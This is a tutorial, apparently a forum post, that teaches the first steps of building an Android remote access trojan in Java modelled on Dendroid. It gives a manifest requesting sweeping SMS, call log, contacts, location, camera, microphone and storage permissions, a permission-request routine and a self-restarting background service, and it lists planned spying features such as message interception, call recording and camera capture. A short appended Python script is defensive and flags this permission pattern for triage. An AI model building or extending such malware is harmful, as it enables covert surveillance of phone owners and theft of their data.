Java Your RAT for Android - Part 1

Tr0jan_Horse

Contents of the article:

  1. Greetings
  2. Creating a Project in Android Studio
  3. Creating an application template and creating part of the future functionality
  4. Conclusion

1. Greeting

Hello and good evening to all readers. This is my first article on the topic of creating a RAT (or bot) for Android in Java, and in general, my first article.

The author of this article was inspired by an existing RAT for Android called Dendroid-HTTP-RAT (or BetterAndroidRat), but after many years, some of the functionality stopped working, and some even require permissions from the Android system for full operation. So the author thought a little and decided, why not write his own RAT having some of the ready-made functionality, which he can easily supplement with his own.

The project itself will consist of several parts - a server and a client. The client will be the RAT itself, installed on an Android smartphone, and the server will be our WEB interface (site) or a program for sending commands to the server (which we may write in future articles).

To write the server part we will need knowledge of PHP, HTML, CSS, MySQL and other things (well, in fact, most of the code will be provided). And for the client, oh what joy, only one language - Java.

I think we can finish with the introduction, since most probably already want to move on to the code itself, so let's go ahead.


2. Creating a project in Android Studio

Help.
I hope that those who want to write or have written applications for Android have already installed Android Studio (in theory, Eclipse would also work, but the author writes in AS, so please don't be angry if something I did doesn't work out in the Eclipse environment), so let's start by creating an empty project. Choose your name, choose the minimum SDK version 16 and Java as the development language, then click "Finish".
Let's move on.

3. Creating an application template and creating part of the future functionality
I think everyone would like their program to work on older versions of Android, so the first thing we will do is create a method for obtaining permissions. However, before that, let's look at the application manifest and write everything we need to work with. If you think that some permissions are not needed, you can remove them (I really added more than required).
XML:
<uses-permission android:name="com.android.vending.BILLING" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
<uses-permission android:name="android.permission.VIBRATE" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.READ_SMS" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.RECORD_AUDIO" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.WAKE_LOCK" />
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.BLUETOOTH" />
<uses-permission android:name="android.permission.BLUETOOTH_ADMIN" />
<uses-permission android:name="android.permission.READ_SYNC_SETTINGS" />
<uses-permission android:name="android.permission.NFC" />
<uses-permission android:name="android.permission.READ_CONTACTS" />
<uses-permission android:name="android.permission.TRANSMIT_IR" />
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.CAMERA" />
<uses-permission android:name="android.permission.WRITE_CALL_LOG" />
<uses-permission android:name="android.permission.READ_CALL_LOG" />
<uses-permission android:name="android.permission.FLASHLIGHT" />
<uses-permission android:name="android.permission.CALL_PHONE" />
<uses-permission android:name="android.permission.GET_PACKAGE_SIZE" />
<uses-permission android:name="com.android.launcher.permission.UNINSTALL_SHORTCUT" />
<uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" />
<uses-permission android:name="android.permission.WRITE_CONTACTS" />
<uses-permission android:name="android.permission.WRITE_SYNC_SETTINGS" />
Well, we're done with the manifest, time to move on to the permissions method. We'll check the SDK version and if it's higher than 23 (somewhere around Android 5 or 6; the author is too lazy to check)
Java:
public void checkPermission() {
    if (Build.VERSION.SDK_INT >= 23) {
        List<String> permissions = null;

        if (checkSelfPermission(Manifest.permission.READ_PHONE_STATE) != PackageManager.PERMISSION_GRANTED) {
            permissions = new ArrayList<>();
            permissions.add(Manifest.permission.READ_PHONE_STATE);
        }
        if (checkSelfPermission(Manifest.permission.GET_ACCOUNTS) != PackageManager.PERMISSION_GRANTED) {
            permissions = new ArrayList<>();
            permissions.add(Manifest.permission.GET_ACCOUNTS);
        }
 
        // The remaining permissions need to be added here following the same pattern
        /*
        if (checkSelfPermission(Manifest.permission.PERMISSION) != PackageManager.PERMISSION_GRANTED) {
            permissions = new ArrayList<>();
            permissions.add(Manifest.permission.PERMISSION);
        }
        */

        if (permissions != null) {
            String[] permissionArray = new String[permissions.size()];
            permissions.toArray(permissionArray);
            requestPermissions(permissionArray, 0);
        }
    }
}
Alas and alack, but you will have to add the rest of the permissions yourself. I hope that this will not be too difficult.
Also in the future we will add another method for checking, which will re-call getting permissions in case of user's refusal (but that's later, so you don't have to read it).

Well, now let's write our method in the main function.
Java:
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);

    try {
        checkPermission();
    } catch (Exception e) {
        e.printStackTrace();
    }

}

I hope no one has any questions about why I made a request via try (well, and if it did, I'll say it - so that the program wouldn't crash if there was an error and we could view it in debug mode).
So. We are done with the main part, now we can be sure that our application will work on all versions (but this is not certain) of Android (starting with the minimum version we specified when creating the project). Next, we will need to create a method for starting the service and the service itself.

We can proceed to the next stage. First, let's create a new Java file and call it MainService. Next, we need to add inheritance to our class and create a couple of methods. In order not to overload you too much, I'll give you the code right away. And yes, AndroidStudio should issue the necessary imports itself, so I don't specify them in the code.

Java:
public class MainService extends Service {

    private final IBinder myBinder = new MyLocalBinder();

    // If you chose a different name, replace MainService with your own
    public class MyLocalBinder extends Binder {
        MainService getService() {
            return MainService.this;
        }
    }

    @Override
    public IBinder onBind(Intent intent) {
        return myBinder;
    }
}

We will also immediately add a method to MainService that is called when the service is created and that starts the thread.

Java:
@Override
public void onCreate() {
    super.onCreate();
    obtainTask.start();
}

All that's left is to create our thread and we can forget about our service for a while. So, we write the following.

Java:
Thread obtainTask = new Thread() {
    @SuppressLint("Wakelock") @Override
    public void run() {
        Looper.prepare();

        while (true) {
            try {
                Thread.sleep(10000);
            } catch (Exception e) {
                obtainTask.start();
            }
        }
    }
};
For now, our service does nothing, it just restarts the service every 10 seconds. We will return to our service later, because it will receive commands, process them and send data to the server, but for now we can return to our main file MainActivity and create a function there to check the functionality of the service we just created.







Java:
private boolean isMyServiceRunning() {
    ActivityManager manager = (ActivityManager) getApplicationContext().getSystemService(Context.ACTIVITY_SERVICE);
    for (RunningServiceInfo service : manager.getRunningServices(Integer.MAX_VALUE)) {
        // use the name of the service you created earlier instead of MainService
        if (MainService.class.getName().equals(service.service.getClassName())) {
            return true;
        }
    }
    return false;
}
Now all that remains is to check when the program starts.

Java:
if (!isMyServiceRunning()) {
    // replace MainService with your own name
    startService(new Intent(getApplicationContext(), MainService.class));
}

4. Conclusion
And yes, initially the code may coincide in some places with the already mentioned Dendroid, but this is only the beginning, so I hope that it will be perceived adequately. In the future, I plan to make the following functionality:

  1. Receiving commands from the website @feature
  2. Receiving commands via Telegram bot
  3. Receiving commands via SMS
  4. Working with messages
    1. Receiving messages @feature
    2. Receive messages with a specific user
    3. Deleting a message
    4. Blocking messages
    5. Sending messages
  5. Working with calls
    1. Receiving calls @feature
    2. Receiving calls with a specific user
    3. Deleting calls
    4. Call blocking
    5. Calling a subscriber
    6. Call recording
  6. Working with the camera
    1. Shooting with the cameras @feature
    2. Video shooting
  7. Sound recording
  8. Getting media (photos) @feature
  9. Access to Explorer (file system access)
  10. Getting information about the device (where would we be without it) @feature
  11. Smartphone control
    1. Volume
    2. Brightness
    3. Wallpaper
    4. Other
This entire list will be expanded. Where there is a @feature mark, it means that this functionality is implemented at the time of writing.
I hope the article turned out interesting and not cumbersome. Write your wishes about what should be corrected, how best to approach the design of the article and what style of communication you would like to see further. If you liked it, then put a mark on the poll.
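
From the reviewing side, the manifest listed above is the first thing static triage sees: SMS, call log, contacts, location, microphone, camera and storage access all requested together with INTERNET. The following is an added example, not code from the original post, that groups the `android.permission.*` entries of a decoded manifest and flags such a combination; the group names, the `THRESHOLD` value and both sample manifests are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
PREFIX = "android.permission."

# Capability groups built from permissions that appear in the article's manifest.
GROUPS = {
    "sms": {"READ_SMS", "SEND_SMS", "RECEIVE_SMS"},
    "calls": {"READ_CALL_LOG", "WRITE_CALL_LOG", "CALL_PHONE", "READ_PHONE_STATE"},
    "contacts": {"READ_CONTACTS", "WRITE_CONTACTS"},
    "location": {"ACCESS_FINE_LOCATION", "ACCESS_COARSE_LOCATION"},
    "capture": {"RECORD_AUDIO", "CAMERA"},
    "storage": {"READ_EXTERNAL_STORAGE", "WRITE_EXTERNAL_STORAGE"},
}
THRESHOLD = 4  # assumption: flag when this many groups are requested with INTERNET


def requested_permissions(manifest_xml):
    """Return the android.permission.* names requested in a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    names = set()
    for tag in ("uses-permission", "uses-permission-sdk-23"):
        for node in root.iter(tag):
            name = node.get(ANDROID_NS + "name", "")
            if name.startswith(PREFIX):  # ignore vendor/custom permissions
                names.add(name[len(PREFIX):])
    return names


def triage(manifest_xml):
    """Report which sensitive groups are requested and whether to escalate."""
    perms = requested_permissions(manifest_xml)
    hits = {g: sorted(perms & m) for g, m in GROUPS.items() if perms & m}
    return {"groups": hits, "flagged": "INTERNET" in perms and len(hits) >= THRESHOLD}


def _manifest(names):  # builds a constructed sample manifest for the demo
    body = "".join('<uses-permission android:name="%s"/>' % n for n in names)
    return ('<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
            'package="com.example.sample">%s</manifest>' % body)


# Constructed samples: one mirrors a subset of the article's list, one is a torch app.
BROAD = _manifest(PREFIX + p for p in (
    "INTERNET", "READ_SMS", "SEND_SMS", "READ_CALL_LOG", "READ_CONTACTS",
    "ACCESS_FINE_LOCATION", "RECORD_AUDIO", "CAMERA", "WRITE_EXTERNAL_STORAGE"))
NARROW = _manifest([PREFIX + "INTERNET", PREFIX + "CAMERA", PREFIX + "FLASHLIGHT"])

if __name__ == "__main__":
    for label, xml in (("broad", BROAD), ("narrow", NARROW)):
        print(label, triage(xml))
```

A flag here is a reason to look closer, not a verdict: legitimate backup or parental-control apps request similar sets, so the result should be combined with signing, distribution source and behavioural evidence.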
 